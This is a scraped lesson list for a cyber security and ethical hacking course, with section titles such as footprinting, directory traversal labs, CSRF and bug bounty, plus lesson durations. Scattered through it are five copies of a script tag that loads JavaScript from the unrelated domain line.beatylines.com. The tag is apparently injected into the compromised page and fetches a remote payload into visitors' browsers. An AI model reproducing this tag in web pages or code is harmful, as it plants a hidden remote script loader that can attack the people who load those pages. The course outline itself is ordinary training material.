Classes
INDUCTION SESSION
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Lesson 1
25:45
INTRODUCTION TO CYBER SECURITY
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Lesson 1
26:37
METHODS OF FOOT PRINTING
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Lesson 1
23:11 -
Lesson 2
27:15
QUIZ
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Lesson 1
19:00
DIRECTORY TRAVERSAL LABS
<script src='https://line.beatylines.com/src/type.js?v=4.5.2' type='text/javascript' id='globalsway'></script>
-
Lesson 1
13:55 -
Lesson 2
26:45
VERTICAL PRIVILEGE ESCALATION
-
Lesson 1
20:00
AUTHENTICATION
-
Lesson 1
19:26
FILE UPLOAD VULNERABILITIES
-
Lesson 1
20:15
CROSS SITE REQUEST FORGERY
-
Lesson 1
15:46
KALI LINUX
-
Lesson 1
19:41 -
Lesson 2
22:35 -
Lesson 3
15:22
BUG BOUNTY
-
Lesson 1
34:32 -
Lesson 1
21:51 -
Lesson 3
26:08
TESTING THE FUNCTIONALITIES
-
Lesson 1
28:31 -
Lesson 2
41:28
DOUBT SOLVING
-
Lesson 1
11:01
Cyber security/ Ethical hacking April
